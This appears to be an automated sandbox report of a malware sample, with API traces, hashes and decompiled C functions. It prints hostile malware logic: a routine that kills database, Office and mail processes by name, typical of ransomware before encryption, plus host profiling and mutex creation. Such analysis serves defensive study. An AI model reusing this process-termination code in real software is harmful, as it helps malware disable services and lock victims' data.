Process32FirstW.KERNEL32(00000000,00000000), ref: 0FBB7C4F
lstrcmpiW.KERNEL32(0FBC03AC,-00000024), ref: 0FBB7C75
Process32NextW.KERNEL32(?,?), ref: 0FBB7CEE
GetLastError.KERNEL32 ref: 0FBB7CF8
lstrlenW.KERNEL32(00000000), ref: 0FBB7D16
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB7D3B
FindCloseChangeNotification.KERNEL32(?), ref: 0FBB7D40
VirtualFree.KERNELBASE(?,?,00008000), ref: 0FBB7D55

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$Free$AllocProcess32$ChangeCloseCreateErrorFindFirstLastNextNotificationSnapshotToolhelp32lstrcmpilstrlen
String ID:
API String ID: 1411803383-0
Opcode ID: d3d9a29c9ffaac0ce764a2ddebb967094b5f159f5a21366969223e6e8fb0bdb2
Instruction ID: 61071f575adbba48ef3f0601e4a993d0f54490da5e92e83fbe6169304b2b1fd7
Opcode Fuzzy Hash: d3d9a29c9ffaac0ce764a2ddebb967094b5f159f5a21366969223e6e8fb0bdb2
Instruction Fuzzy Hash: 96518F71E00218EFCB209F95E848BAE7BB4FF89765F60419DE900BB281CBB45905CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB48C0 Relevance: 15.1, APIs: 10, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0FBB48C0() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				void* _t49;
				void* _t50;
				int _t51;
				int _t52;
				int _t53;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
				_t70 = _t49;
				_v172 = _t70;
				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
				_t60 = _t50;
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70); // executed
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000); // executed
				}
				_t53 = FindCloseChangeNotification(_t72); // executed
				return _t53;
			}

0x0fbb48c6
0x0fbb48d3
0x0fbb48db
0x0fbb48e3
0x0fbb48eb
0x0fbb48f3
0x0fbb48fb
0x0fbb4903
0x0fbb490b
0x0fbb4913
0x0fbb491b
0x0fbb4923
0x0fbb492b
0x0fbb4933
0x0fbb493b
0x0fbb4943
0x0fbb494b
0x0fbb4953
0x0fbb495b
0x0fbb4963
0x0fbb496b
0x0fbb4973
0x0fbb497b
0x0fbb4983
0x0fbb498b
0x0fbb4993
0x0fbb499b
0x0fbb49a3
0x0fbb49ae
0x0fbb49b9
0x0fbb49c4
0x0fbb49cf
0x0fbb49da
0x0fbb49e5
0x0fbb49f0
0x0fbb49fb
0x0fbb4a06
0x0fbb4a11
0x0fbb4a1c
0x0fbb4a27
0x0fbb4a32
0x0fbb4a44
0x0fbb4a48
0x0fbb4a4c
0x0fbb4a52
0x0fbb4a56
0x0fbb4a58
0x0fbb4a61
0x0fbb4a63
0x0fbb4a65
0x0fbb4a65
0x0fbb4a61
0x0fbb4a71
0x0fbb4a71
0x0fbb4a74
0x0fbb4a74
0x0fbb4a80
0x0fbb4a85
0x0fbb4a8d
0x0fbb4a9b
0x0fbb4a9f
0x0fbb4aa4
0x0fbb4ab1
0x0fbb4ab1
0x0fbb4a9f
0x0fbb4abb
0x0fbb4abc
0x0fbb4abc
0x0fbb4abf
0x0fbb4ac4
0x0fbb4aca
0x0fbb4ad0
0x0fbb4ad0
0x0fbb4ad3
0x0fbb4ad9
0x0fbb4ae3
0x0fbb4ae3
0x0fbb4aea
0x0fbb4af2

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0FBB4A32
VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0FBB4A4C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0FBB4A65
lstrcmpiW.KERNEL32(00000002,00000024), ref: 0FBB4A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0FBB4A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0FBB4AA4
CloseHandle.KERNEL32(00000000), ref: 0FBB4AB1
Process32NextW.KERNEL32(?,00000000), ref: 0FBB4ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB4AE3
FindCloseChangeNotification.KERNEL32(?), ref: 0FBB4AEA

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
String ID:
API String ID: 3023235786-0
Opcode ID: cb4dfb9ad5a3a0beee4db74af1e18e264a91b3f1dca1265d7f77525f7d5ec1c5
Instruction ID: c5c08fa5443bb71637cd1e669f020eb8575e506ee4d85c4b0a90f2d0db5fc39e
Opcode Fuzzy Hash: cb4dfb9ad5a3a0beee4db74af1e18e264a91b3f1dca1265d7f77525f7d5ec1c5
Instruction Fuzzy Hash: 34512CB6508340DFD6208F96AC487FABBE8FB81718F60498CE9955B252D7F09809CF56

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB47D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringmemorysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0FBB3BC0: GetProcessHeap.KERNEL32(?,?,0FBB4807,00000000,?,00000000,00000000), ref: 0FBB3C5C

Part of subcall function 0FBB7490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FBB74B7
Part of subcall function 0FBB7490: GetUserNameW.ADVAPI32 ref: 0FBB74C8
Part of subcall function 0FBB7490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FBB74E6
Part of subcall function 0FBB7490: GetComputerNameW.KERNEL32 ref: 0FBB74F0
Part of subcall function 0FBB7490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FBB7510
Part of subcall function 0FBB7490: wsprintfW.USER32 ref: 0FBB7551
Part of subcall function 0FBB7490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FBB756E
Part of subcall function 0FBB7490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FBB7592
Part of subcall function 0FBB7490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0FBB4810,?), ref: 0FBB75B6
Part of subcall function 0FBB7490: RegCloseKey.KERNEL32(00000000), ref: 0FBB75D2

Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB72F2
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB72FD
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7313
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB731E
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7334
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB733F
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7355
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(0FBB4B36,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7360
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7376
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7381
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7397
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73A2
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73C1
Part of subcall function 0FBB72A0: lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73CC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB482C
lstrcpyW.KERNEL32 ref: 0FBB484F
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB4856
CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB486E
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB487A
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB4881
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB489B

Strings

Global\, xrefs: 0FBB4849

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: d6e8e13ed0140fad8388613f520d180884e98fdba305ed512f800507065f2b4f
Instruction ID: ea007263d69bd679a97ed35280931dac57722e3bbe7f5f97f9666f0207b94f44
Opcode Fuzzy Hash: d6e8e13ed0140fad8388613f520d180884e98fdba305ed512f800507065f2b4f
Instruction Fuzzy Hash: 9821F671650311BBE124AB64EC4AFFF775CEB40B51F90066CBA05A70C1AED87905CEE5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB35C0 Relevance: 13.6, APIs: 9, Instructions: 94
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB35C0(intOrPtr __ecx, intOrPtr __edx) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long _v24;
				void* _t12;
				void* _t14;
				long _t17;
				void* _t18;
				int _t21;
				void* _t25;
				char* _t29;
				void* _t37;
				void* _t39;

				_v16 = __edx;
				_v20 = __ecx;
				_v12 = 0;
				_t12 = VirtualAlloc(0, 0xa00, 0x3000, 4); // executed
				_t39 = _t12;
				if(_t39 != 0) {
					GetModuleFileNameW(0, _t39, 0x100);
					_t14 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0, 0); // executed
					_t37 = _t14;
					if(_t37 != 0xffffffff) {
						_t17 = GetFileSize(_t37, 0);
						_v8 = _t17;
						_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
						_t25 = _t18;
						if(_t25 != 0) {
							_t21 = ReadFile(_t37, _t25, _v8,  &_v24, 0); // executed
							if(_t21 != 0) {
								_t29 = _v8 - 1 + _t25;
								if( *_t29 != 0) {
									do {
										_t29 = _t29 - 1;
									} while ( *_t29 != 0);
									E0FBB34F0(_t29 + 1, _v20, _v16);
									_t32 =  !=  ? 1 : 0;
									_v12 =  !=  ? 1 : 0;
								}
							}
							VirtualFree(_t25, 0, 0x8000); // executed
						}
						FindCloseChangeNotification(_t37); // executed
					}
					VirtualFree(_t39, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t12;
				}
			}

0x0fbb35dc
0x0fbb35df
0x0fbb35e2
0x0fbb35e9
0x0fbb35eb
0x0fbb35ef
0x0fbb3600
0x0fbb3616
0x0fbb361c
0x0fbb3621
0x0fbb3626
0x0fbb3636
0x0fbb3639
0x0fbb363b
0x0fbb363f
0x0fbb364c
0x0fbb3654
0x0fbb365a
0x0fbb365f
0x0fbb3661
0x0fbb3661
0x0fbb3662
0x0fbb366e
0x0fbb367f
0x0fbb3682
0x0fbb3682
0x0fbb365f
0x0fbb368d
0x0fbb368d
0x0fbb3694
0x0fbb3694
0x0fbb36a2
0x0fbb36b1
0x0fbb35f6
0x0fbb35f6
0x0fbb35f6

APIs

VirtualAlloc.KERNEL32(00000000,00000A00,00003000,00000004,?,74CB6980), ref: 0FBB35E9
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100,74CF82B0), ref: 0FBB3600
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0FBB3616
GetFileSize.KERNEL32(00000000,00000000), ref: 0FBB3626
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0FBB3639
ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0FBB364C
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB368D
FindCloseChangeNotification.KERNEL32(00000000), ref: 0FBB3694
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB36A2

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocFree$ChangeCloseCreateFindModuleNameNotificationReadSize
String ID:
API String ID: 511603811-0
Opcode ID: adeac8b0f9ee1e25b6491ddc0047f132cabf03e3c46a4def8618b62142300343
Instruction ID: 1263c7a3bd62fd6d0f248c7be4c177082d46840af1bf464783a54d1c3edc154c
Opcode Fuzzy Hash: adeac8b0f9ee1e25b6491ddc0047f132cabf03e3c46a4def8618b62142300343
Instruction Fuzzy Hash: E321F931B403047BF7215BA59C86FEE7BACEB49721F240059FB05BA2C1DAF895118F54

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB7D70 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB7D70(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

0x0fbb7d71
0x0fbb7d7d
0x0fbb7d89
0x0fbb7d89
0x0fbb7d8f
0x0fbb7d9b
0x0fbb7d9b
0x0fbb7da1
0x0fbb7dad
0x0fbb7dad
0x0fbb7db3
0x0fbb7dbf
0x0fbb7dbf
0x0fbb7dc5
0x0fbb7dd1
0x0fbb7dd1
0x0fbb7dd7
0x0fbb7de3
0x0fbb7de3
0x0fbb7de9
0x0fbb7df5
0x0fbb7df5
0x0fbb7dfb
0x0fbb7e07
0x0fbb7e07
0x0fbb7e0d
0x0fbb7e19
0x0fbb7e19
0x0fbb7e22
0x00000000
0x0fbb7e31
0x0fbb7e35

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7D89
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7D9B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7DAD
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7DBF
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7DD1
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7DE3
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7DF5
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7E07
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7E19
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0FBB48AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7E31

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: fba0835658843b7a13869cae9b7a0b647e627c2dfd66d7182cb2d6540de07961
Instruction ID: 4f9dbf7ab1b9fd5af75ef2c79720a8b3854d7dabcf71d1a7341017d3b0cacd4f
Opcode Fuzzy Hash: fba0835658843b7a13869cae9b7a0b647e627c2dfd66d7182cb2d6540de07961
Instruction Fuzzy Hash: 8821AD30280B04AAE6765A15EC0AFF6B6A1FF80B45F75496CE2C1248F18BF57499DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB4A78 Relevance: 10.5, APIs: 7, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB4A78(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				int _t10;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000); // executed
					}
					_t10 = FindCloseChangeNotification(_t24); // executed
					return _t10;
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

0x0fbb4a78
0x0fbb4a78
0x0fbb4a80
0x0fbb4a80
0x0fbb4a85
0x0fbb4a8d
0x0fbb4a9b
0x0fbb4a9f
0x0fbb4aa4
0x0fbb4ab1
0x0fbb4ab1
0x0fbb4a9f
0x0fbb4abb
0x0fbb4abc
0x0fbb4abc
0x0fbb4ac2
0x00000000
0x00000000
0x0fbb4ac4
0x0fbb4ac4
0x0fbb4aca
0x0fbb4ad0
0x0fbb4ad0
0x0fbb4ad5
0x0fbb4a74
0x0fbb4a80
0x00000000
0x00000000
0x00000000
0x0fbb4a80
0x0fbb4ad9
0x0fbb4ae3
0x0fbb4ae3
0x0fbb4aea
0x0fbb4af2
0x0fbb4a80
0x0fbb4a85
0x0fbb4a8d
0x0fbb4a9b
0x0fbb4a9f
0x0fbb4aa4
0x0fbb4ab1
0x0fbb4ab1
0x0fbb4a9f
0x0fbb4abb
0x0fbb4abc
0x0fbb4abc
0x0fbb4abf

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 0FBB4A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0FBB4A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0FBB4AA4
CloseHandle.KERNEL32(00000000), ref: 0FBB4AB1
Process32NextW.KERNEL32(?,00000000), ref: 0FBB4ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBB4AE3
FindCloseChangeNotification.KERNEL32(?), ref: 0FBB4AEA

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
String ID:
API String ID: 3573210778-0
Opcode ID: 7a1b1e4af0d72cfb80d53ca0f604752017b82635951bd85f41f1a257d2311c19
Instruction ID: e368399e492b915ff351ff337be596fe84d4bcf17b8218ba6b12574f8a868644
Opcode Fuzzy Hash: 7a1b1e4af0d72cfb80d53ca0f604752017b82635951bd85f41f1a257d2311c19
Instruction Fuzzy Hash: 8101D632600211EFD7209F51BC89BFA73ACFB85312F714058FD09A7042EBE4A8168FA5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB7410 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB7410(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x0fbb7426
0x0fbb7430
0x0fbb7484
0x0fbb7432
0x0fbb7435
0x0fbb7447
0x0fbb744f
0x0fbb7466
0x0fbb746f
0x0fbb747b
0x0fbb7451
0x0fbb7454
0x0fbb7457
0x0fbb7463
0x0fbb7463
0x0fbb744f

APIs

